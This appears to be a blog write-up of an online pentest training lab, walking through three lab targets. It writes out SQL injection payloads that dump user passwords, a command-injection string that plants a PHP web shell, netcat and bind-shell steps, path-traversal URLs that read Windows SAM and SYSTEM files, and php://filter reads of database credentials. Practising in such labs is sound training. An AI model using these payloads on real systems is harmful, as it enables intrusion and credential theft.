Practical Pentest Labs

Hey all,

Just a FYI, this is more or less a placeholder post with little content until I upload a walk-through.

While surfing reddit/netsec someone posted a link of a walk-through of some targets in a virtual pentest lab called practicalpentestlabs, naturally I decided to give it a go.

To join the game, it’s as simple as registering and establishing a VPN session into the lab environment via openvpn.  Target IP addresses are provided, and depending on the difficulty, a little hint giving potential avenues of attack.  The goal is to hack into each of the targets and grab the contents of secret.txt, which usually resides in /root or the administrator’s desktop.  The contents of secret can then be submitted for points, the amount awarded is based on the difficulty of the target.  Accumulated points are tracked on a pretty slick dashboard … sorry I couldn’t help myself :S 

At the moment, I’ve worked through the web application and scenario based targets with the exception of “X”.  I thought the targets were challenging but not insanely difficult.  Practical pentest labs was a great walk-through of various vulnerabilities while not obscuring them to a point where it’s less an exploitation exercise, and more a game of hide and seek.

What to Expect

Enumeration is pretty straightforward; practical pentest labs isn’t trying to obscure the vulnerabilities.  Usually, you might have to look into robots.txt or perform more enumeration; but often, that additional piece of information shouldn’t be overly difficult to find, just try a little bit harder.

Exploitation is a bit more difficult.  I found that reverse shells were not possible due to what I expect was egress filtering.  Mind you, maybe I should have followed my previous post and performed a bit of egress enumeration.  In addition to not being able to establish a reverse shell, I found that netcat on several of the targets did not support the -e switch, adding an extra bit of a twist.  In the end it wasn’t a big deal as for several of the targets I was able to upload files via a webpage or just pipe it over with netcat.

I made a rough list of the exploited vulnerabilities, as follows:

• SQLi
• LFI
• Bruteforcing
• MySQL UDF
• Getting shells in various manners (access.log, ssh auth_keys, etc.)
• Buffer overflows
• Password reuse
• Pass the hash
• Excessive file permissions
• Privilege escalation

All in all, a pretty decent list.

C3PO – 10.0.1.6

The webpage is another language but the vulnerabilities are pretty overt.  Clicking the home link screams lfi – http://10.0.1.6/?box=./inc/index_box_nologin.php

.Vyhledavani is vulnerable to error based sqli but I ended up registering (registrace) an account and injecting into slozka.php on the authenticated pages – http://10.0.1.6/inc/slozka.php?slozka=in&iduser=26.

• List Databases
  • iduser=27-26%20UNION%20SELECT%201,2,3,database%28%29,5,6;–
• List Tables
  • iduser=27-26 UNION SELECT 1,2,table_schema,table_name,5,6 FROM information_schema.tables where table_schema = ‘vuln;–
• List columns
  • iduser=27-26%20UNION%20SELECT%201,table_schema,table_name,column_name,5,6%20FROM%20information_schema.columns%20where%20table_schema%20=%20%27vuln%27;–
• List users and passwords
  • iduser=27-26%20UNION%20SELECT%201,login,heslo,4,5,6%20FROM%20vuln.users;–

The passwords are MD5, a quick stop to your favourite online hash database will give you the credentials for the admin account: username: admin / password: pass123

Login with the admin account and a new menu option is available: Sprava.  The Sprava page will ping hosts on your behalf … how nice of them.  Unfortunately, the command is vulnerable to command injection.

From here, we can upload a simple php web shell.  Note, $ had to be escaped \$.

192.168.1.1; echo “<?php print ‘hello’; if(isset(\$_REQUEST[‘cmd’])){ echo ‘<pre>’; \$cmd = (\$_REQUEST[‘cmd’]); system(\$cmd); echo ‘</pre>’; die;}” > /var/www/html/cpl.php

If all goes well, cpl.php will be accessible from http://10.0.1.6/cpl.php and you should see hello on the screen.  I started moving over the files needed to create a bind shell and to privilege escalate.

• Listen and pipe the privesc file into /tmp
  • http://10.0.1.6/cpl.php?cmd=nc -lvp 4444 > /tmp/40616
• Send the privesc file
  • nc 10.0.1.6 4444 < /tmp/40616
• Do the same for a bind shell executable
• Set the permissions of the executable
  • http://10.0.1.6/cpl.php?cmd=chmod 755 /tmp/cplshe9091
• Execute the bind shell executable
  • http://10.0.1.6/cpl.php?cmd=/tmp/cplshe9091
• Within the bind session, spawn a tty shell
  • python -c ‘import pty; pty.spawn(“/bin/bash”)’
• Change the perms and execute your privesc executable, 40616
• Rock and roll

To privesc, I used dirtycow.  Note, if you are compiling, don’t forget to compile for 32 bit architecture.

Vader – 10.0.1.13

Port 80 doesn’t have much in the way of content, but notice the web server: Zervit httpd 0.4, that’s different.  A quick google search revealed the following vulnerability:  https://www.exploit-db.com/exploits/12582/.   Using the examples in the link, boot.ini is available for download thus proving that we have LFI.  With LFI and ports 135 and 445 available, we have a perfect setup for getting the target’s hashes and then spawning a session by passing the hash.

• http://10.0.1.13/index.html?../../../../../../../../../windows/repair/sam
• http://10.0.1.13/index.html?../../../../../../../../../windows/repair/system

The SAM and SYSTEM files are there; however, we need to be mindful that these files could be out-of-date so spawning a session might not be possible.  Using pwdump to drop the hashes:

I played around with the administrator account but it appears that the practicalpentestlab guys tinkered around with the permissions so Vader is your man for pth.

Leia – 10.0.1.14

The webserver root has a directory listing with two files: page.php and register.php.  Page.php has a php include warning that a file cannot be found, potential LFI.  Register.php has a registration page with several POST fields with a submit button.  When a single quote is put into any of the fields a controlled error message of “Invalid Query” is displayed, potential SQL injection.  Further digging revealed that the userName variable, at least, is vulnerable to blind SQL injection.  Like any sane person, when dealing with blind SQLi, I decided to use sqlmap.

Sqlipost.txt is a sample capture of the post to the registration page.  Passing sqlipost.txt to sqlmap at level 3 will detect the blind SQLi vulnerability.

• sqlmap -r sqlipost.txt -p userName –level=3

Using sqlmap I was able to download /etc/passwd but unable to do so for page.php.  Playing around with page.php, I found that the variable name was page and was indeed vulnerable to LFI.

Using php://filter I downloaded register.php and found that it loads .dbcontroller.php to connect to the mysql database.  Downloading .dbcontroller.php give credentials to mysql database and surprise, Leia used the same password

• http://10.0.1.14/page.php?page=php://filter/convert.base64-encode/resource=register.php
• http://10.0.1.14/page.php?page=php://filter/convert.base64-encode/resource=.dbcontroller.php

SSH in with Leia, copy the dirtycow local privilege escalation exploit with nc, get root, and go get /root/secret.txt.